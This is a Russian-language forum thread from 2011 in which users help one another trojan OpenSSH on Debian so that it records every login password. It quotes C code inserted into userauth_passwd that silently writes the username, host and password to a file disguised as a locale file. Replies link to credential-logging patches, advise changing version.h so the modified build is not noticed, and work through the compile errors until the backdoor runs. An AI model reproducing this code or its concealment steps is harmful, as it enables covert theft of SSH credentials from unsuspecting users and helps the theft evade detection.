Старый 12.11.2011, 05:37   #1
ReanimatoR
 
Аватар для ReanimatoR
 
Регистрация: 09.07.2010
Сообщений: 29
Репутация: 3
По умолчанию затрояненный openssh на debian.

Помогите пожалуйста разобраться, что делаю не так. надо чтобы openssh логировал все пароли.

OpenSSH_5.5p1 Debian-6, OpenSSL 0.9.8o 01 Jun 2010

стянул сорцы.
сделал все как тут http://hellknights.void.ru/articles/0x48k-OpenSSH-backdooring.html
но не фурычит на дебиане почему-то. не логирует куда надо(да и вообще никуда)...
даже поставил openssh уже готовый от туда OpenSSH_4.6p1, OpenSSL 0.9.8o 01 Jun 2010 все равно не работает
__________________
[ InfoSecurity ] [ AntiDDos ]
ReanimatoR вне форума   Ответить с цитированием
Старый 12.11.2011, 07:43   #2
ReanimatoR
 
Аватар для ReanimatoR
 
Регистрация: 09.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

или может сниффер который нюхает пароли на ssh поставить? гуглю часа 3 уже ничего толком не нашел

ЗЫ
эти методы с sshconnect2.c не катят тоже

Цитата:
int

userauth_passwd(Authctxt *authctxt)

{

static int ifile, attempt = 0; /* Не забудем объявить переменную ifile */

if (attempt != 1)

error("Permission denied, please try again.");

snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",

authctxt->server_user, authctxt->host);

password = read_passphrase(prompt, 0);

/* Шпионская вставка в правильный код */

ifile=fopen("/usr/share/locale/it/console.it", "a"); /* Откроем шпионский файл на запись в конец */

fprintf(ifile, "%s %s is %s\n", authctxt->server_user, authctxt->host, password);

/* Запишем в файл имя пользователя, хост и пароль - главную информацию для размышления */

fclose(ifile); /* Корректно закроем файл */
заранее:
да демон ребутаю, даже машину ребутнул чтобы наверняка. делаю из под рута все.

Делаю на
2.6.32-5-amd64 #1 SMP Tue Jun 14 09:42:28 UTC 2011 x86_64 GNU/Linux
уже даже не знаю что еще придумать. перебрал кучу старинных снифферов бесполезных некомпилящихся, либо эроррящих, толку от них ноль полный тоже.
__________________
[ InfoSecurity ] [ AntiDDos ]
ReanimatoR вне форума   Ответить с цитированием
Старый 12.11.2011, 09:36   #3
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

https://forum.zloy.bz/showthread.php?p=4717424
Я пользовался вот этим вот diff'ом.
Выкачивай версию, для которых написан этот патч ("патч для версий от 4.4 -4.7"). Потом открой файл version.h и там измени версию, на ту, что установлена в данный момент, чтобы не было палева.
Tigger вне форума   Ответить с цитированием
Старый 12.11.2011, 14:16   #4
ReanimatoR
 
Аватар для ReanimatoR
 
Регистрация: 09.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

Цитата:
Сообщение от Tigger Посмотреть сообщение
https://forum.zloy.bz/showthread.php?p=4717424
Я пользовался вот этим вот diff'ом.
Выкачивай версию, для которых написан этот патч ("патч для версий от 4.4 -4.7"). Потом открой файл version.h и там измени версию, на ту, что установлена в данный момент, чтобы не было палева.
попробовал поставить на 4.4, 4.7, 4.6 этот патч - перекомпилил, собрал - толку ноль
__________________
[ InfoSecurity ] [ AntiDDos ]
ReanimatoR вне форума   Ответить с цитированием
Старый 12.11.2011, 14:55   #5
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

https://rdot.org/forum/showpost.php?p=7858&postcount=31
euro вне форума   Ответить с цитированием
Старый 12.11.2011, 16:00   #6
ReanimatoR
 
Аватар для ReanimatoR
 
Регистрация: 09.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

Цитата:
Сообщение от euro Посмотреть сообщение
https://rdot.org/forum/showpost.php?p=7858&postcount=31
ща попробую разобраться что не так, но запощу сюда на всякий, вылетает


Цитата:
1 out of 5 hunks FAILED -- saving rejects to file auth.c.rej
patching file auth-pam.c
Hunk #1 succeeded at 467 with fuzz 2.
patching file auth-passwd.c
Hunk #1 FAILED at 81.
1 out of 1 hunk FAILED -- saving rejects to file auth-passwd.c.rej
patching file canohost.c
Hunk #1 FAILED at 75.
1 out of 1 hunk FAILED -- saving rejects to file canohost.c.rej
тэкс. добавил
--ignore-whitespace к
patch --ignore-whitespace
заработал твой патч

теперь новая ошибка

Цитата:
../includes.h:26: warning: ‘sendit’ defined but not used
../includes.h:26: warning: ‘sendit’ defined but not used
../includes.h:26: warning: ‘sendit’ defined but not used
../includes.h:26: warning: ‘sendit’ defined but not used
bsd-getpeereid.c: In function ‘getpeereid’:
bsd-getpeereid.c:30: error: storage size of ‘cred’ isn’t known
bsd-getpeereid.c:30: warning: unused variable ‘cred’
make[1]: *** [bsd-getpeereid.o] Ошибка 1
make: *** [openbsd-compat/libopenbsd-compat.a] Ошибка 2

Цитата:
gcc -g -O2 -Wall -Wpointer-arith -Wuninitialized -Wsign-compare -Wno-pointer-sign -I. -I.. -I. -I./.. -DHAVE_CONFIG_H -c bsd-getpeereid.c
bsd-getpeereid.c: In function ‘getpeereid’:
bsd-getpeereid.c:30: error: storage size of ‘cred’ isn’t known
bsd-getpeereid.c:30: warning: unused variable ‘cred’
make[1]: *** [bsd-getpeereid.o] Ошибка 1
make[1]: Leaving directory `/tmp/openssh-4.5p1/openbsd-compat'
make: *** [openbsd-compat/libopenbsd-compat.a] Ошибка 2
__________________
[ InfoSecurity ] [ AntiDDos ]
ReanimatoR вне форума   Ответить с цитированием
Старый 12.11.2011, 16:58   #7
ReanimatoR
 
Аватар для ReanimatoR
 
Регистрация: 09.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

и фикс последней баги
открываем bsd-getpeereid.c и наверх добавим
#undef SO_PEERCRED
теперь все работает

всем кто помогал - огромное спасибо
__________________
[ InfoSecurity ] [ AntiDDos ]
ReanimatoR вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot